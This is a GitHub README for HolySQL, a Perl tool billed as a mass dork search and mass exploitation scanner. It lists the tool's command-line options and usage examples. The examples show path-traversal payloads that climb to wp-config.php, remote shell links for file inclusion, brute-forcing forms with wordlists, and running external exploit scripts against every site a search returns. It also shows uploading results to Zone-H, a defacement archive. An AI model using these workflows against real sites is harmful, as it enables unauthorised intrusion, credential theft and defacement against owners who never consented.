Skip to content

igemcoin/HolySQL

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

HolySQL SCANNER

Advanced Search / Dork / Mass Exploitation Scanner
فاحص متقدم لبحث و استغلال الثغرات بالجملة

[!] LEGAL DISCLAIMER:
SMARTSOFT Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent! It is your responsibility to obey laws!
Tool: HolySQL V 14.0.2
Codename:4n0n4t
AUTHOR:Ali MEHDIOUI
GROUP:SMARTSOFT Technology
FACE:facebook.com/SMARTSOFT.Technology
YOUTUBE:youtube.com/c/SMARTSOFTechnology
TWITTER:twitter.com/SMARTSOFTTechno
PLUS:plus.google.com/+SMARTSOFTTechnology
Description:

● Search engine Google / Bing / Ask / Yandex / Sogou
● Mass Dork Search
● Multiple instant scans.
● Mass Exploitation
● Use proxy.
● Random user agent.
● Random engine.
● Extern commands execution.
● XSS / SQLI / LFI / AFD scanner.
● Filter wordpress and Joomla sites.
● Find Admin page.
● Decode / Encode Base64 / MD5
● Ports scan.
● Collect IPs
● Collect E-mails.
● Auto detect errors.
● Auto detect Cms.
● Post data.
● Auto sequence repeater.
● Validation.
● Post and Get method
● Interactive and Normal interface.
● And more...

★ Libreries to install:
Perl Required.
Works in all platforms. Disponible in Blackarch linux and Dracos systems.
Download:
● git clone
● direct link: https://github.com/SMARTSOFTTechnology/HolySQL
Permissions:
cd HolySQL
chmod +x ./holysql.pl
Installation:
chmod +x ./install.sh
./install.sh
Execution:
Portable Execution: perl ./holysql.pl
Installed Tool Execution: holysql
Menu: Applications > Web Application analysis > holysql
Repair Tool:
HolySQL --repair
Uninstall Tool:
HolySQL --uninstall
Screenshots:










Commands:
--help / -h Help.
--proxy Set tor proxy for scans [EX: --proxy "socks://localhost:9050"]
Set proxy [EX: --proxy "http://12.45.44.2:8080"]
Set proxy list [EX: --proxy list.txt]
--motor / -m Set engine motors default bing EX: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
--proxy-random Random proxy [EX: --proxy-random list.txt] or --proxy-random "socks://localhost:9050"]
--m-random Random of all disponibles engines
--b-random Random all disponibles agents
--freq Random time frequency (in seconds)
--time set browser time out
--dork / -d Dork to search [Ex: house [OTHER]cars [OTHER]hotel]
--target / -t Target
--level / -l Scan level (+- Number of page results to scan)
--zone Search engine country.
--param / -p Set test parameter EX:id,cat,product_ID
--save / -s Output.
--source Html output file
--bugtraq Serach exploits and issues
--content Print request content
--data Post and Get forms. See examples
--vshell Validate by url
--post Use post method
--upload Upload method
--get Use get method
--header Set headers
--host Domain name [Ex: site.com]
--nobanner Hide tool banner
--beep Produce beep sound if positive scan found.
--ifend Produce beep sound when scan process is finished.
--noinfo Jump extra results info.
--ping Host ping.
--limit Limit max positive scan results.
--valid / -v Validate by string at least 1 is matching
--all Validate all given strings
--status Validate by http header status
--ifinurl Get targets with exact string matching
--sregex Get targets with exact regex matching
--exclude Get targets where strings do not exist in html
--unique Get targets with exact dork matching
--replace Replace exact string
--replaceFROM Replace from string to the end of target
--payload Use your own payloads instead of tool ones
--exp / -e Exploit/Payload will be added to full target
--expHost Exploit will be added to the host
--expIp Exploit will be added to the host ip
--sql Xss scan
--lfi Local file inclusion
--joomrfi Scan for joomla local file inclusion.
--shell Shell link [Ex: http://www.site.com/shell.txt]
--wpafd Scan wordpress sites for arbitrary file download
--admin Get site admin page
--shost Get site subdomains
--tcp TCP port
--udp UDP port
--index Get target engine index
--wp Wordpress sites in the server
--joom Joomla sites in the server
--zip Get zip files
--md5 Convert to md5
--encode64 Encode base64 string
--decode64 decode base64 string
--TARGET Will be replaced by target in extern command
--HOST Will be replaced by host in extern command
--HOSTIP Will be replaced by host IP in extern command
--PORT Will be replaced by open port in extern command
--ip Collect Ips
--regex Crawl to get strings matching regex
--noquery Remove string value from Query url [ex: site.com/index.php?id=string]
--command / -c Extern Command to execute
--popup Execute Extern Command in new terminal window
--zoneH Upload to Zone-H
--cookies Cookies output file
--email Collect emails
rang(x-y) EX: --expHost "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?id=rang(1-9)" --sql
site.com/index.php?id=1 -> 9.
repeat(txt-y) EX: --expHost "/index.php?id=repeat(../-9)wp-config.php" --sql OR -t "site.com/index.php?id=../wp-config.php"
In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
[OTHER] To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
--update Update tool
--repair Repair or force tool update.
--tool / -? Tool info.
--config User configuration.
--interactive / -i Interactive mode interface.
--uninstall Uninstall Tool.
Examples:
PROXY:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: Proxy: --proxy [proxy] Ex: http://12.32.1.5:8080
or --proxy list.txt Ex: --proxy my_proxies.txt

RANDOM:
Random proxy: --proxy-random [proxy list.txt]
Random browser: --b-random
Random engine: --m-random

SET HEADERS:
HolySQL --dork [dork / dorks.txt] --level [level] --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"
HolySQL -t target --data "name=>username, email=>xxxxxx, pass=>xxxxx" --post --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"

SEARCH ENGINE:
Search: HolySQL --dork [dork] --level [level]
Search: HolySQL -d [dork] -l [level]
Set engine: HolySQL --dork [dork] --level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
Set selective engines: HolySQL -d [dork] -l [level] -m 1,2,3..
Search with many dorks: HolySQL --dork dork1 [OTHER]dork2 [OTHER]dork3] --level [level]
Search and rand: HolySQL -d [dork] -l [level] --expHost "/index.php?id=rang(1-9)" --sql
Get target engine index: HolySQL -t [target] --level [value] --index
Get Server wordpress sites: HolySQL -t [target] --wp
Search + output: HolySQL --dork [dorks.txt] --level [level] --save
Search + get emails: HolySQL -d [dorks.txt] -l [level] --email
Search + get site emails: HolySQL --dork site:site.com --level [level] --email
Search + get ips: HolySQL --dork [dork] --level [level] --ip

REGULAR EXPRESSIONS:
Regex use: HolySQL [--dork [dork> / -t [target]] --level [level] --regex [regex]
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'

REPEATER:
HolySQL -t site.com?index.php?id=rang(1-10) --sql
HolySQL -t [target] --expHost "/index.php?id=rang(1-10)" --sql
HolySQL -t [target] --expHost "/index.php?id=repeat(../-9)wp-config.php"

PORTS
HolySQL -t [ip] --port [port] [--udp / --tcp]
HolySQL -t (ip start)-(ip end) --port [port] [--udp / --tcp]
HolySQL -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"

ENCODE / DECODE:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

DATA:
Data: HolySQL -t [target] --data "field1=>value1, field2=>value2, field3=>value3" [--post / --get / --upload]
Exploit: --exp/expHost --data "field1=>value1, field2=>value2, field3=>value3" --vshell [shell path] -v [string] / --status [code] [--post / --get / --upload]
Wordlist: --data "field1=>value1, field2=>WORDLIST:" --vshell [shell path] -v [string] / --status [code] [--post / --get / --upload]

EXTERNAL COMMANDES:
HolySQL --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET"
HolySQL --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"
HolySQL --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP"
HolySQL -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2 --command "php WP-dl-skin.php-exploit.php --TARGET"

MULTIPLE SCANS:
HolySQL --dork [dork> --level [10] --sql --lfi --wp ..
HolySQL --dork [dork> --level [10] --replace [string => new_string] --exp/expHost [payload] [--sql / --lfi / --wp /...]
HolySQL -t [ip] --level [10] [--sql / --lfi / --wp /...]
HolySQL -t [target] [--sql / --lfi / --wp /...]

USER PAYLOADS:
HolySQL --dork [dork] --level [10] [--lfi | --sql ..] --payload [payload | payloads.txt]

SEARCH VALIDATION:
HolySQL -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/list.txt]
HolySQL -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/list.txt] --all
HolySQL -d [dork / dorks.txt] -l [level] --status [code] / --exclude [string/list.txt]
HolySQL -d [dork / dorks.txt] -l [level] --ifinurl [string]
HolySQL -d [dork / dorks.txt] -l [level] --sregex [regex] --valid [string]
HolySQL -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string]
HolySQL -d [dork / dorks.txt] -l [level] --unique

SCAN VALIDATION:
HolySQL -t [target / targets.txt] [--status [code] / --valid [string]
HolySQL -t [target / targets.txt] --vshell [file path]
HolySQL -d [dork / dorks.txt] -l [level] --exp/expHost [payload] --status [code] / --valid [string]
HolySQL -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]
HolySQL -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string]
HolySQL -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]
HolySQL -d [dorks.txt] -l [level] --replaceFROM [string => new_string] --status [code] / --valid [string]
HolySQL -d [dorks.txt] -l [level] --replace [string => new_string] --exp/expHost [payload] --status [code] / --valid [string]
HolySQL -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string]
HolySQL -t [target / targets.txt] --valid [string] --exclude [string]

ZONE-H:
HolySQL -t [target / targets.txt] -v [string] --zoneH "notifier => /attachement/file.php"

SEARCH EXPLOITS:
HolySQL --bugtraq [string] EX: HolySQL --bugtraq wordpress
HolySQL --bugtraq [string] --limit 10

UPDATE TOOL:
HolySQL --update

UNINSTALL TOOL:
HolySQL --uninstall
THANKS TO:
Blackarch linux & Dragos Os developers to incorporate my project in their systems.

About

An SQL Injection Project.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published